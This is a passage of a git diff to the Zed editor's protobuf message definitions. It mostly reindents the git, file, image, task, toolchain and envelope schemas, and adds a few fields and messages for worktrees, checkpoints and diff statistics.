configuration = 7; } message LogToDebugConsole { - uint64 project_id = 1; - uint64 session_id = 2; - string message = 3; + uint64 project_id = 1; + uint64 session_id = 2; + string message = 3; } message GetProcesses { - uint64 project_id = 1; + uint64 project_id = 1; } message GetProcessesResponse { - repeated ProcessInfo processes = 1; + repeated ProcessInfo processes = 1; } message ProcessInfo { - uint32 pid = 1; - string name = 2; - repeated string command = 3; + uint32 pid = 1; + string name = 2; + repeated string command = 3; } diff --git a/crates/proto/proto/download.proto b/crates/proto/proto/download.proto index fd1d63e78db581866981cb90372f84716be8a958..44b1da3389abc2996e2fb9acf6e42d2b3ae54f44 100644 --- a/crates/proto/proto/download.proto +++ b/crates/proto/proto/download.proto @@ -5,32 +5,32 @@ import "core.proto"; import 
"worktree.proto"; message DownloadFileByPath { - uint64 project_id = 1; - uint64 worktree_id = 2; - string path = 3; - uint64 file_id = 4; + uint64 project_id = 1; + uint64 worktree_id = 2; + string path = 3; + uint64 file_id = 4; } message DownloadFileResponse { - uint64 file_id = 1; + uint64 file_id = 1; } message CreateFileForPeer { - uint64 project_id = 1; - PeerId peer_id = 2; - oneof variant { - FileState state = 3; - FileChunk chunk = 4; - } + uint64 project_id = 1; + PeerId peer_id = 2; + oneof variant { + FileState state = 3; + FileChunk chunk = 4; + } } message FileState { - uint64 id = 1; - optional File file = 2; - uint64 content_size = 3; + uint64 id = 1; + optional File file = 2; + uint64 content_size = 3; } message FileChunk { - uint64 file_id = 1; - bytes data = 2; + uint64 file_id = 1; + bytes data = 2; } diff --git a/crates/proto/proto/git.proto b/crates/proto/proto/git.proto index facaf43fd5ae3e7ff655f0b4006dc1661d503e10..9324feb21b1f50ac1041ed0afc8b59cb9b7fe2c6 100644 --- a/crates/proto/proto/git.proto +++ b/crates/proto/proto/git.proto @@ -1,277 +1,256 @@ syntax = "proto3"; package zed.messages; -import "worktree.proto"; import "buffer.proto"; +import "worktree.proto"; message GitBranchesResponse { - repeated Branch branches = 1; + repeated Branch branches = 1; } message UpdateDiffBases { - uint64 project_id = 1; - uint64 buffer_id = 2; - - enum Mode { - // No collaborator is using the unstaged diff. - HEAD_ONLY = 0; - // No collaborator is using the diff from HEAD. - INDEX_ONLY = 1; - // Both the unstaged and uncommitted diffs are demanded, - // and the contents of the index and HEAD are the same for this path. - INDEX_MATCHES_HEAD = 2; - // Both the unstaged and uncommitted diffs are demanded, - // and the contents of the index and HEAD differ for this path, - // where None means the path doesn't exist in that state of the repo. 
- INDEX_AND_HEAD = 3; - } - - optional string staged_text = 3; - optional string committed_text = 4; - Mode mode = 5; + uint64 project_id = 1; + uint64 buffer_id = 2; + + enum Mode { + // No collaborator is using the unstaged diff. + HEAD_ONLY = 0; + // No collaborator is using the diff from HEAD. + INDEX_ONLY = 1; + // Both the unstaged and uncommitted diffs are demanded, + // and the contents of the index and HEAD are the same for this path. + INDEX_MATCHES_HEAD = 2; + // Both the unstaged and uncommitted diffs are demanded, + // and the contents of the index and HEAD differ for this path, + // where None means the path doesn't exist in that state of the repo. + INDEX_AND_HEAD = 3; + } + + optional string staged_text = 3; + optional string committed_text = 4; + Mode mode = 5; } message OpenUnstagedDiff { - uint64 project_id = 1; - uint64 buffer_id = 2; + uint64 project_id = 1; + uint64 buffer_id = 2; } message OpenUnstagedDiffResponse { - optional string staged_text = 1; + optional string staged_text = 1; } message OpenUncommittedDiff { - uint64 project_id = 1; - uint64 buffer_id = 2; + uint64 project_id = 1; + uint64 buffer_id = 2; } message OpenUncommittedDiffResponse { - enum Mode { - INDEX_MATCHES_HEAD = 0; - INDEX_AND_HEAD = 1; - } - optional string staged_text = 1; - optional string committed_text = 2; - Mode mode = 3; + enum Mode { + INDEX_MATCHES_HEAD = 0; + INDEX_AND_HEAD = 1; + } + optional string staged_text = 1; + optional string committed_text = 2; + Mode mode = 3; } message SetIndexText { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string path = 4; - optional string text = 5; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string path = 4; + optional string text = 5; } message GetPermalinkToLine { - uint64 project_id = 1; - uint64 buffer_id = 2; - Range selection = 3; + uint64 project_id = 1; + uint64 buffer_id = 2; + Range selection = 3; } message GetPermalinkToLineResponse { - string permalink = 1; + 
string permalink = 1; } message Branch { - bool is_head = 1; - string ref_name = 2; - optional uint64 unix_timestamp = 3; - optional GitUpstream upstream = 4; - optional CommitSummary most_recent_commit = 5; + bool is_head = 1; + string ref_name = 2; + optional uint64 unix_timestamp = 3; + optional GitUpstream upstream = 4; + optional CommitSummary most_recent_commit = 5; } message GitUpstream { - string ref_name = 1; - optional UpstreamTracking tracking = 2; + string ref_name = 1; + optional UpstreamTracking tracking = 2; } message UpstreamTracking { - uint64 ahead = 1; - uint64 behind = 2; + uint64 ahead = 1; + uint64 behind = 2; } message CommitSummary { - string sha = 1; - string subject = 2; - int64 commit_timestamp = 3; - string author_name = 4; + string sha = 1; + string subject = 2; + int64 commit_timestamp = 3; + string author_name = 4; } message GitBranches { - uint64 project_id = 1; - ProjectPath repository = 2; + uint64 project_id = 1; + ProjectPath repository = 2; } - message UpdateGitBranch { - uint64 project_id = 1; - string branch_name = 2; - ProjectPath repository = 3; + uint64 project_id = 1; + string branch_name = 2; + ProjectPath repository = 3; } message UpdateRepository { - uint64 project_id = 1; - uint64 id = 2; - string abs_path = 3; - repeated uint64 entry_ids = 4; - optional Branch branch_summary = 5; - repeated StatusEntry updated_statuses = 6; - repeated string removed_statuses = 7; - repeated string current_merge_conflicts = 8; - uint64 scan_id = 9; - bool is_last_update = 10; - optional GitCommitDetails head_commit_details = 11; - optional string merge_message = 12; - repeated StashEntry stash_entries = 13; - optional string remote_upstream_url = 14; - optional string remote_origin_url = 15; + uint64 project_id = 1; + uint64 id = 2; + string abs_path = 3; + repeated uint64 entry_ids = 4; + optional Branch branch_summary = 5; + repeated StatusEntry updated_statuses = 6; + repeated string removed_statuses = 7; + repeated string 
current_merge_conflicts = 8; + uint64 scan_id = 9; + bool is_last_update = 10; + optional GitCommitDetails head_commit_details = 11; + optional string merge_message = 12; + repeated StashEntry stash_entries = 13; + optional string remote_upstream_url = 14; + optional string remote_origin_url = 15; + optional string original_repo_abs_path = 16; + repeated Worktree linked_worktrees = 17; } message RemoveRepository { - uint64 project_id = 1; - uint64 id = 2; + uint64 project_id = 1; + uint64 id = 2; } enum GitStatus { - Added = 0; - Modified = 1; - Conflict = 2; - Deleted = 3; - Updated = 4; - TypeChanged = 5; - Renamed = 6; - Copied = 7; - Unmodified = 8; + Added = 0; + Modified = 1; + Conflict = 2; + Deleted = 3; + Updated = 4; + TypeChanged = 5; + Renamed = 6; + Copied = 7; + Unmodified = 8; } message GitFileStatus { - oneof variant { - Untracked untracked = 1; - Ignored ignored = 2; - Unmerged unmerged = 3; - Tracked tracked = 4; - } - - message Untracked {} - message Ignored {} - message Unmerged { - GitStatus first_head = 1; - GitStatus second_head = 2; - } - message Tracked { - GitStatus index_status = 1; - GitStatus worktree_status = 2; - } + oneof variant { + Untracked untracked = 1; + Ignored ignored = 2; + Unmerged unmerged = 3; + Tracked tracked = 4; + } + + message Untracked {} + message Ignored {} + message Unmerged { + GitStatus first_head = 1; + GitStatus second_head = 2; + } + message Tracked { + GitStatus index_status = 1; + GitStatus worktree_status = 2; + } } message GitGetBranches { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; } message GitCreateBranch { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string branch_name = 4; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string branch_name = 4; } message GitChangeBranch { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string branch_name = 4; + 
uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string branch_name = 4; } message GitRenameBranch { - uint64 project_id = 1; - uint64 repository_id = 2; - string branch = 3; - string new_name = 4; + uint64 project_id = 1; + uint64 repository_id = 2; + string branch = 3; + string new_name = 4; } message GitCreateRemote { - uint64 project_id = 1; - uint64 repository_id = 2; - string remote_name = 3; - string remote_url = 4; + uint64 project_id = 1; + uint64 repository_id = 2; + string remote_name = 3; + string remote_url = 4; } message GitRemoveRemote { - uint64 project_id = 1; - uint64 repository_id = 2; - string remote_name = 3; + uint64 project_id = 1; + uint64 repository_id = 2; + string remote_name = 3; } message GitDeleteBranch { - uint64 project_id = 1; - uint64 repository_id = 2; - string branch_name = 3; + uint64 project_id = 1; + uint64 repository_id = 2; + string branch_name = 3; + bool is_remote = 4; } message GitDiff { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - DiffType diff_type = 4; - optional string merge_base_ref = 5; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + DiffType diff_type = 4; + optional string merge_base_ref = 5; - enum DiffType { - HEAD_TO_WORKTREE = 0; - HEAD_TO_INDEX = 1; - MERGE_BASE = 2; - } + enum DiffType { + HEAD_TO_WORKTREE = 0; + HEAD_TO_INDEX = 1; + MERGE_BASE = 2; + } } message GitDiffResponse { - string diff = 1; -} - -message GitDiffStat { - uint64 project_id = 1; - uint64 repository_id = 2; - DiffType diff_type = 3; - optional string merge_base_ref = 4; - - enum DiffType { - HEAD_TO_WORKTREE = 0; - HEAD_TO_INDEX = 1; - MERGE_BASE = 2; - } -} - -message GitDiffStatResponse { - repeated GitDiffStatEntry entries = 1; -} - -message GitDiffStatEntry { - string path = 1; - uint32 added = 2; - uint32 deleted = 3; + string diff = 1; } message GitInit { - uint64 project_id = 1; - string abs_path = 2; - string fallback_branch_name = 3; + uint64 project_id = 1; + 
string abs_path = 2; + string fallback_branch_name = 3; } message GitClone { - uint64 project_id = 1; - string abs_path = 2; - string remote_repo = 3; + uint64 project_id = 1; + string abs_path = 2; + string remote_repo = 3; } message GitCloneResponse { - bool success = 1; + bool success = 1; } message CheckForPushedCommits { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; } message CheckForPushedCommitsResponse { @@ -279,338 +258,402 @@ message CheckForPushedCommitsResponse { } message GitShow { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string commit = 4; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string commit = 4; } message GitCommitDetails { - string sha = 1; - string message = 2; - int64 commit_timestamp = 3; - string author_email = 4; - string author_name = 5; + string sha = 1; + string message = 2; + int64 commit_timestamp = 3; + string author_email = 4; + string author_name = 5; } message LoadCommitDiff { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string commit = 4; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string commit = 4; } message LoadCommitDiffResponse { - repeated CommitFile files = 1; + repeated CommitFile files = 1; } message CommitFile { - string path = 1; - optional string old_text = 2; - optional string new_text = 3; - bool is_binary = 4; + string path = 1; + optional string old_text = 2; + optional string new_text = 3; + bool is_binary = 4; } message GitReset { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string commit = 4; - ResetMode mode = 5; - enum ResetMode { - SOFT = 0; - MIXED = 1; - } + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string commit = 4; + ResetMode mode = 5; + enum ResetMode { + SOFT = 0; + MIXED = 1; + } } message GitCheckoutFiles { - uint64 project_id = 1; - reserved 2; - uint64 
repository_id = 3; - string commit = 4; - repeated string paths = 5; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string commit = 4; + repeated string paths = 5; } message GitFileHistory { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string path = 4; - uint64 skip = 5; - optional uint64 limit = 6; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string path = 4; + uint64 skip = 5; + optional uint64 limit = 6; } message GitFileHistoryResponse { - repeated FileHistoryEntry entries = 1; - string path = 2; + repeated FileHistoryEntry entries = 1; + string path = 2; } message FileHistoryEntry { - string sha = 1; - string subject = 2; - string message = 3; - int64 commit_timestamp = 4; - string author_name = 5; - string author_email = 6; + string sha = 1; + string subject = 2; + string message = 3; + int64 commit_timestamp = 4; + string author_name = 5; + string author_email = 6; } // Move to `git.proto` once collab's min version is >=0.171.0. message StatusEntry { - string repo_path = 1; - // Can be removed once collab's min version is >=0.171.0. - GitStatus simple_status = 2; - GitFileStatus status = 3; + string repo_path = 1; + // Can be removed once collab's min version is >=0.171.0. 
+ GitStatus simple_status = 2; + GitFileStatus status = 3; + optional uint32 diff_stat_added = 4; + optional uint32 diff_stat_deleted = 5; } message StashEntry { - bytes oid = 1; - string message = 2; - optional string branch = 3; - uint64 index = 4; - int64 timestamp = 5; + bytes oid = 1; + string message = 2; + optional string branch = 3; + uint64 index = 4; + int64 timestamp = 5; } message Stage { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - repeated string paths = 4; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + repeated string paths = 4; } message Unstage { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - repeated string paths = 4; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + repeated string paths = 4; } message Stash { - uint64 project_id = 1; - uint64 repository_id = 2; - repeated string paths = 3; + uint64 project_id = 1; + uint64 repository_id = 2; + repeated string paths = 3; } message StashPop { - uint64 project_id = 1; - uint64 repository_id = 2; - optional uint64 stash_index = 3; + uint64 project_id = 1; + uint64 repository_id = 2; + optional uint64 stash_index = 3; } message StashApply { - uint64 project_id = 1; - uint64 repository_id = 2; - optional uint64 stash_index = 3; + uint64 project_id = 1; + uint64 repository_id = 2; + optional uint64 stash_index = 3; } message StashDrop { - uint64 project_id = 1; - uint64 repository_id = 2; - optional uint64 stash_index = 3; + uint64 project_id = 1; + uint64 repository_id = 2; + optional uint64 stash_index = 3; } message Commit { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - optional string name = 4; - optional string email = 5; - string message = 6; - optional CommitOptions options = 7; - reserved 8; - uint64 askpass_id = 9; - - message CommitOptions { - bool amend = 1; - bool signoff = 2; - } + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + optional string name = 4; + 
optional string email = 5; + string message = 6; + optional CommitOptions options = 7; + reserved 8; + uint64 askpass_id = 9; + + message CommitOptions { + bool amend = 1; + bool signoff = 2; + bool allow_empty = 3; + } } message OpenCommitMessageBuffer { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; } message Push { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string remote_name = 4; - string branch_name = 5; - optional PushOptions options = 6; - uint64 askpass_id = 7; - string remote_branch_name = 8; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string remote_name = 4; + string branch_name = 5; + optional PushOptions options = 6; + uint64 askpass_id = 7; + string remote_branch_name = 8; - enum PushOptions { - SET_UPSTREAM = 0; - FORCE = 1; - } + enum PushOptions { + SET_UPSTREAM = 0; + FORCE = 1; + } } message Fetch { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - uint64 askpass_id = 4; - optional string remote = 5; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + uint64 askpass_id = 4; + optional string remote = 5; } message GetRemotes { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - optional string branch_name = 4; - bool is_push = 5; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + optional string branch_name = 4; + bool is_push = 5; } message GetRemotesResponse { - repeated Remote remotes = 1; + repeated Remote remotes = 1; - message Remote { - string name = 1; - } + message Remote { + string name = 1; + } } message Pull { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string remote_name = 4; - optional string branch_name = 5; - uint64 askpass_id = 6; - bool rebase = 7; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string remote_name = 4; + optional string branch_name = 5; + uint64 askpass_id = 6; + 
bool rebase = 7; } message RemoteMessageResponse { - string stdout = 1; - string stderr = 2; + string stdout = 1; + string stderr = 2; } message BlameBuffer { - uint64 project_id = 1; - uint64 buffer_id = 2; - repeated VectorClockEntry version = 3; + uint64 project_id = 1; + uint64 buffer_id = 2; + repeated VectorClockEntry version = 3; } message BlameEntry { - bytes sha = 1; + bytes sha = 1; - uint32 start_line = 2; - uint32 end_line = 3; - uint32 original_line_number = 4; + uint32 start_line = 2; + uint32 end_line = 3; + uint32 original_line_number = 4; - optional string author = 5; - optional string author_mail = 6; - optional int64 author_time = 7; - optional string author_tz = 8; + optional string author = 5; + optional string author_mail = 6; + optional int64 author_time = 7; + optional string author_tz = 8; - optional string committer = 9; - optional string committer_mail = 10; - optional int64 committer_time = 11; - optional string committer_tz = 12; + optional string committer = 9; + optional string committer_mail = 10; + optional int64 committer_time = 11; + optional string committer_tz = 12; - optional string summary = 13; - optional string previous = 14; + optional string summary = 13; + optional string previous = 14; - string filename = 15; + string filename = 15; } message CommitMessage { - bytes oid = 1; - string message = 2; + bytes oid = 1; + string message = 2; } message CommitPermalink { - bytes oid = 1; - string permalink = 2; + bytes oid = 1; + string permalink = 2; } message BlameBufferResponse { - message BlameResponse { - repeated BlameEntry entries = 1; - repeated CommitMessage messages = 2; - reserved 3; - reserved 4; - } + message BlameResponse { + repeated BlameEntry entries = 1; + repeated CommitMessage messages = 2; + reserved 3; + reserved 4; + } - optional BlameResponse blame_response = 5; + optional BlameResponse blame_response = 5; - reserved 1 to 4; + reserved 1 to 4; } message GetDefaultBranch { - uint64 project_id = 1; - uint64 
repository_id = 2; + uint64 project_id = 1; + uint64 repository_id = 2; } message GetDefaultBranchResponse { - optional string branch = 1; + optional string branch = 1; } message GetTreeDiff { - uint64 project_id = 1; - uint64 repository_id = 2; - bool is_merge = 3; - string base = 4; - string head = 5; + uint64 project_id = 1; + uint64 repository_id = 2; + bool is_merge = 3; + string base = 4; + string head = 5; } message GetTreeDiffResponse { - repeated TreeDiffStatus entries = 1; + repeated TreeDiffStatus entries = 1; } message TreeDiffStatus { - enum Status { - ADDED = 0; - MODIFIED = 1; - DELETED = 2; - } + enum Status { + ADDED = 0; + MODIFIED = 1; + DELETED = 2; + } - Status status = 1; - string path = 2; - optional string oid = 3; + Status status = 1; + string path = 2; + optional string oid = 3; } message GetBlobContent { - uint64 project_id = 1; - uint64 repository_id = 2; - string oid =3; + uint64 project_id = 1; + uint64 repository_id = 2; + string oid = 3; } message GetBlobContentResponse { - string content = 1; + string content = 1; } message GitGetWorktrees { - uint64 project_id = 1; - uint64 repository_id = 2; + uint64 project_id = 1; + uint64 repository_id = 2; +} + +message GitGetHeadSha { + uint64 project_id = 1; + uint64 repository_id = 2; +} + +message GitGetHeadShaResponse { + optional string sha = 1; } message GitWorktreesResponse { - repeated Worktree worktrees = 1; + repeated Worktree worktrees = 1; } message Worktree { - string path = 1; - string ref_name = 2; - string sha = 3; + string path = 1; + string ref_name = 2; + string sha = 3; + bool is_main = 4; } message GitCreateWorktree { - uint64 project_id = 1; - uint64 repository_id = 2; - string name = 3; - string directory = 4; - optional string commit = 5; + uint64 project_id = 1; + uint64 repository_id = 2; + string name = 3; + string directory = 4; + optional string commit = 5; +} + +message GitCreateCheckpoint { + uint64 project_id = 1; + uint64 repository_id = 2; +} + +message 
GitCreateCheckpointResponse { + bytes commit_sha = 1; +} + +message GitRestoreCheckpoint { + uint64 project_id = 1; + uint64 repository_id = 2; + bytes commit_sha = 3; +} + +message GitCompareCheckpoints { + uint64 project_id = 1; + uint64 repository_id = 2; + bytes left_commit_sha = 3; + bytes right_commit_sha = 4; +} + +message GitCompareCheckpointsResponse { + bool equal = 1; +} + +message GitDiffCheckpoints { + uint64 project_id = 1; + uint64 repository_id = 2; + bytes base_commit_sha = 3; + bytes target_commit_sha = 4; +} + +message GitDiffCheckpointsResponse { + string diff = 1; +} + +message GitRemoveWorktree { + uint64 project_id = 1; + uint64 repository_id = 2; + string path = 3; + bool force = 4; +} + +message GitRenameWorktree { + uint64 project_id = 1; + uint64 repository_id = 2; + string old_path = 3; + string new_path = 4; } message RunGitHook { - enum GitHook { - PRE_COMMIT = 0; - reserved 1; - } - - uint64 project_id = 1; - uint64 repository_id = 2; - GitHook hook = 3; + enum GitHook { + PRE_COMMIT = 0; + reserved 1; + } + + uint64 project_id = 1; + uint64 repository_id = 2; + GitHook hook = 3; } diff --git a/crates/proto/proto/image.proto b/crates/proto/proto/image.proto index e3232e6847cbc719280bc3ccd5254e5e368dbeb6..ff791e1f87b6089e6e87ec746fad173b180f10ef 100644 --- a/crates/proto/proto/image.proto +++ b/crates/proto/proto/image.proto @@ -5,32 +5,32 @@ import "core.proto"; import "worktree.proto"; message OpenImageByPath { - uint64 project_id = 1; - uint64 worktree_id = 2; - string path = 3; + uint64 project_id = 1; + uint64 worktree_id = 2; + string path = 3; } message OpenImageResponse { - uint64 image_id = 1; + uint64 image_id = 1; } message CreateImageForPeer { - uint64 project_id = 1; - PeerId peer_id = 2; - oneof variant { - ImageState state = 3; - ImageChunk chunk = 4; - } + uint64 project_id = 1; + PeerId peer_id = 2; + oneof variant { + ImageState state = 3; + ImageChunk chunk = 4; + } } message ImageState { - uint64 id = 1; - optional 
File file = 2; - uint64 content_size = 3; - string format = 4; // e.g., "png", "jpeg", "webp", etc. + uint64 id = 1; + optional File file = 2; + uint64 content_size = 3; + string format = 4; // e.g., "png", "jpeg", "webp", etc. } message ImageChunk { - uint64 image_id = 1; - bytes data = 2; + uint64 image_id = 1; + bytes data = 2; } diff --git a/crates/proto/proto/lsp.proto b/crates/proto/proto/lsp.proto index 9132dafbd42be8e1f7d0de2b1278d7bf757aa9ac..813f9e9ec652a7b97281bea29f368b0dcf37d537 100644 --- a/crates/proto/proto/lsp.proto +++ b/crates/proto/proto/lsp.proto @@ -2,8 +2,6 @@ syntax = "proto3"; package zed.messages; import "buffer.proto"; -import "core.proto"; -import "worktree.proto"; message GetDefinition { uint64 project_id = 1; @@ -232,6 +230,7 @@ message ApplyCompletionAdditionalEdits { uint64 project_id = 1; uint64 buffer_id = 2; Completion completion = 3; + repeated AnchorRange all_commit_ranges = 4; } message ApplyCompletionAdditionalEditsResponse { diff --git a/crates/proto/proto/notification.proto b/crates/proto/proto/notification.proto index ebd3d7fe447991c38c9d616fc944f366f51782c0..8a41854ac161100c60d66d0b27b49bc4b2182a22 100644 --- a/crates/proto/proto/notification.proto +++ b/crates/proto/proto/notification.proto @@ -2,36 +2,36 @@ syntax = "proto3"; package zed.messages; message GetNotifications { - optional uint64 before_id = 1; + optional uint64 before_id = 1; } message AddNotification { - Notification notification = 1; + Notification notification = 1; } message GetNotificationsResponse { - repeated Notification notifications = 1; - bool done = 2; + repeated Notification notifications = 1; + bool done = 2; } message DeleteNotification { - uint64 notification_id = 1; + uint64 notification_id = 1; } message UpdateNotification { - Notification notification = 1; + Notification notification = 1; } message MarkNotificationRead { - uint64 notification_id = 1; + uint64 notification_id = 1; } message Notification { - uint64 id = 1; - uint64 timestamp 
= 2; - string kind = 3; - optional uint64 entity_id = 4; - string content = 5; - bool is_read = 6; - optional bool response = 7; + uint64 id = 1; + uint64 timestamp = 2; + string kind = 3; + optional uint64 entity_id = 4; + string content = 5; + bool is_read = 6; + optional bool response = 7; } diff --git a/crates/proto/proto/task.proto b/crates/proto/proto/task.proto index 1844087d623cc3eac0e5d7500a50dfb31028f304..8d941c2438c55045d8d38cb4c97d918be8abbeb4 100644 --- a/crates/proto/proto/task.proto +++ b/crates/proto/proto/task.proto @@ -4,57 +4,57 @@ package zed.messages; import "buffer.proto"; message TaskContextForLocation { - uint64 project_id = 1; - Location location = 2; - map task_variables = 3; + uint64 project_id = 1; + Location location = 2; + map task_variables = 3; } message TaskContext { - optional string cwd = 1; - map task_variables = 2; - map project_env = 3; + optional string cwd = 1; + map task_variables = 2; + map project_env = 3; } message Shell { - message WithArguments { - string program = 1; - repeated string args = 2; - } + message WithArguments { + string program = 1; + repeated string args = 2; + } - oneof shell_type { - System system = 1; - string program = 2; - WithArguments with_arguments = 3; - } + oneof shell_type { + System system = 1; + string program = 2; + WithArguments with_arguments = 3; + } } message System {} enum RevealStrategy { - RevealAlways = 0; - RevealNever = 1; + RevealAlways = 0; + RevealNever = 1; } enum HideStrategy { - HideAlways = 0; - HideNever = 1; - HideOnSuccess = 2; + HideAlways = 0; + HideNever = 1; + HideOnSuccess = 2; } message SpawnInTerminal { - string label = 1; - optional string command = 2; - repeated string args = 3; - map env = 4; - optional string cwd = 5; + string label = 1; + optional string command = 2; + repeated string args = 3; + map env = 4; + optional string cwd = 5; } message GetDirectoryEnvironment { - uint64 project_id = 1; - Shell shell = 2; - string directory = 3; + uint64 project_id = 
1; + Shell shell = 2; + string directory = 3; } message DirectoryEnvironment { - map environment = 1; + map environment = 1; } diff --git a/crates/proto/proto/toolchain.proto b/crates/proto/proto/toolchain.proto index b190322ca0602078ea28d00fe970e4958fb17fb0..a91948148e64eb9eff7f1ca657dab203a9ca7f1f 100644 --- a/crates/proto/proto/toolchain.proto +++ b/crates/proto/proto/toolchain.proto @@ -2,58 +2,58 @@ syntax = "proto3"; package zed.messages; message ListToolchains { - uint64 project_id = 1; - uint64 worktree_id = 2; - string language_name = 3; - optional string path = 4; + uint64 project_id = 1; + uint64 worktree_id = 2; + string language_name = 3; + optional string path = 4; } message Toolchain { - string name = 1; - string path = 2; - string raw_json = 3; + string name = 1; + string path = 2; + string raw_json = 3; } message ToolchainGroup { - uint64 start_index = 1; - string name = 2; + uint64 start_index = 1; + string name = 2; } message ListToolchainsResponse { - repeated Toolchain toolchains = 1; - bool has_values = 2; - repeated ToolchainGroup groups = 3; - optional string relative_worktree_path = 4; + repeated Toolchain toolchains = 1; + bool has_values = 2; + repeated ToolchainGroup groups = 3; + optional string relative_worktree_path = 4; } message ActivateToolchain { - uint64 project_id = 1; - uint64 worktree_id = 2; - Toolchain toolchain = 3; - string language_name = 4; - optional string path = 5; + uint64 project_id = 1; + uint64 worktree_id = 2; + Toolchain toolchain = 3; + string language_name = 4; + optional string path = 5; } message ActiveToolchain { - uint64 project_id = 1; - uint64 worktree_id = 2; - string language_name = 3; - optional string path = 4; + uint64 project_id = 1; + uint64 worktree_id = 2; + string language_name = 3; + optional string path = 4; } message ActiveToolchainResponse { - optional Toolchain toolchain = 1; + optional Toolchain toolchain = 1; } message ResolveToolchain { - uint64 project_id = 1; - string abs_path = 2; - 
string language_name = 3; + uint64 project_id = 1; + string abs_path = 2; + string language_name = 3; } message ResolveToolchainResponse { - oneof response { - Toolchain toolchain = 1; - string error = 2; - } + oneof response { + Toolchain toolchain = 1; + string error = 2; + } } diff --git a/crates/proto/proto/zed.proto b/crates/proto/proto/zed.proto index fa55e1f27330fb5fee88fb19296f607b1bf9f3a6..8b62754d7af40b7c4f5e1a87ad42899d682ba453 100644 --- a/crates/proto/proto/zed.proto +++ b/crates/proto/proto/zed.proto @@ -18,495 +18,495 @@ import "toolchain.proto"; import "worktree.proto"; // Looking for a number? Search "// current max" - message Envelope { - uint32 id = 1; - optional uint32 responding_to = 2; - optional PeerId original_sender_id = 3; - optional uint32 ack_id = 266; - - oneof payload { - Hello hello = 4; - Ack ack = 5; - Error error = 6; - Ping ping = 7; - Test test = 8; - EndStream end_stream = 165; - - CreateRoom create_room = 9; - CreateRoomResponse create_room_response = 10; - JoinRoom join_room = 11; - JoinRoomResponse join_room_response = 12; - RejoinRoom rejoin_room = 13; - RejoinRoomResponse rejoin_room_response = 14; - LeaveRoom leave_room = 15; - Call call = 16; - IncomingCall incoming_call = 17; - CallCanceled call_canceled = 18; - CancelCall cancel_call = 19; - DeclineCall decline_call = 20; - UpdateParticipantLocation update_participant_location = 21; - RoomUpdated room_updated = 22; - - ShareProject share_project = 23; - ShareProjectResponse share_project_response = 24; - UnshareProject unshare_project = 25; - JoinProject join_project = 26; - JoinProjectResponse join_project_response = 27; - LeaveProject leave_project = 28; - AddProjectCollaborator add_project_collaborator = 29; - UpdateProjectCollaborator update_project_collaborator = 30; - RemoveProjectCollaborator remove_project_collaborator = 31; - - GetDefinition get_definition = 32; - GetDefinitionResponse get_definition_response = 33; - GetDeclaration get_declaration = 237; - 
GetDeclarationResponse get_declaration_response = 238; - GetTypeDefinition get_type_definition = 34; - GetTypeDefinitionResponse get_type_definition_response = 35; - - GetReferences get_references = 36; - GetReferencesResponse get_references_response = 37; - GetDocumentHighlights get_document_highlights = 38; - GetDocumentHighlightsResponse get_document_highlights_response = 39; - GetProjectSymbols get_project_symbols = 40; - GetProjectSymbolsResponse get_project_symbols_response = 41; - OpenBufferForSymbol open_buffer_for_symbol = 42; - OpenBufferForSymbolResponse open_buffer_for_symbol_response = 43; - - UpdateProject update_project = 44; - UpdateWorktree update_worktree = 45; - - CreateProjectEntry create_project_entry = 46; - RenameProjectEntry rename_project_entry = 47; - CopyProjectEntry copy_project_entry = 48; - DeleteProjectEntry delete_project_entry = 49; - ProjectEntryResponse project_entry_response = 50; - ExpandProjectEntry expand_project_entry = 51; - ExpandProjectEntryResponse expand_project_entry_response = 52; - ExpandAllForProjectEntry expand_all_for_project_entry = 291; - ExpandAllForProjectEntryResponse expand_all_for_project_entry_response = 292; - UpdateDiagnosticSummary update_diagnostic_summary = 53; - StartLanguageServer start_language_server = 54; - UpdateLanguageServer update_language_server = 55; - - OpenBufferById open_buffer_by_id = 56; - OpenBufferByPath open_buffer_by_path = 57; - OpenBufferResponse open_buffer_response = 58; - CreateBufferForPeer create_buffer_for_peer = 59; - UpdateBuffer update_buffer = 60; - UpdateBufferFile update_buffer_file = 61; - SaveBuffer save_buffer = 62; - BufferSaved buffer_saved = 63; - BufferReloaded buffer_reloaded = 64; - ReloadBuffers reload_buffers = 65; - ReloadBuffersResponse reload_buffers_response = 66; - 